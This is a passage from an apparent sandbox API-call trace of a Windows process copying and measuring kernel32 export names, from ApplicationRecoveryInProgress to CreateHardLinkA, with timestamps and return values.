returned 27 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0179.823] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0179.823] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0179.823] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0179.823] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0179.823] lstrlenA (lpString="BACKUPREAD") returned 10 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0179.823] lstrlenA (lpString="BACKUPSEEK") returned 10 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0179.823] lstrlenA (lpString="BACKUPWRITE") returned 11 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0179.823] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0179.823] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0179.823] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0179.823] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0179.823] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0179.823] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0179.823] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0179.823] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0179.823] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0179.823] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0179.824] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0179.824] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0179.824] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0179.824] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0179.824] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0179.824] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0179.824] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0179.824] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0179.824] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0179.824] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0179.824] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0179.824] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0179.824] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0179.824] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0179.824] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0179.824] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0179.824] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0179.824] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0179.824] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0179.824] lstrlenA (lpString="BEEP") returned 4 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0179.825] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0179.825] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0179.825] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0179.825] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0179.825] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0179.825] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0179.825] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0179.825] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0179.825] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0179.825] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0179.825] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0179.825] lstrlenA (lpString="CANCELIO") returned 8 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0179.825] lstrlenA (lpString="CANCELIOEX") returned 10 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0179.825] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0179.825] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0179.825] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0179.825] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0179.825] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0179.825] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0179.826] lstrlenA (lpString="CHECKELEVATION") returned 14 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0179.826] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0179.826] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0179.826] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0179.826] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0179.826] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0179.826] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0179.826] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0179.826] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0179.826] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0179.826] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0179.826] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0179.826] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0179.826] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0179.826] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0179.826] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0179.826] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0179.826] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0179.826] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0179.826] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0179.827] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0179.827] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0179.827] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0179.827] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0179.827] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0179.827] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0179.827] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0179.827] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0179.827] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0179.827] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0179.827] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0179.827] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0179.827] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0179.827] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0179.827] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0179.827] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0179.827] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0179.827] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0179.827] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0179.827] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0179.827] lstrlenA (lpString="COPYCONTEXT") returned 11 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0179.828] lstrlenA (lpString="COPYFILEA") returned 9 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0179.828] lstrlenA (lpString="COPYFILEEXA") returned 11 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0179.828] lstrlenA (lpString="COPYFILEEXW") returned 11 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0179.828] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0179.828] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0179.828] lstrlenA (lpString="COPYFILEW") returned 9 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0179.828] lstrlenA (lpString="COPYLZFILE") returned 10 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0179.828] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0179.828] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0179.828] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0179.828] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0179.828] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0179.828] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0179.828] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0179.828] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0179.828] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0179.828] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0179.828] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0179.828] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0179.829] lstrlenA (lpString="CREATEEVENTA") returned 12 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0179.829] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0179.829] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0179.829] lstrlenA (lpString="CREATEEVENTW") returned 12 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0179.829] lstrlenA (lpString="CREATEFIBER") returned 11 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0179.829] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0179.829] lstrlenA (lpString="CREATEFILEA") returned 11 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0179.829] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0179.829] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0179.829] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0179.829] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0179.829] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0179.829] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0179.829] lstrlenA (lpString="CREATEFILEW") returned 11 [0179.829] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0179.829] lstrlenA (lpString="CREATEHARDLINKA") returned 15 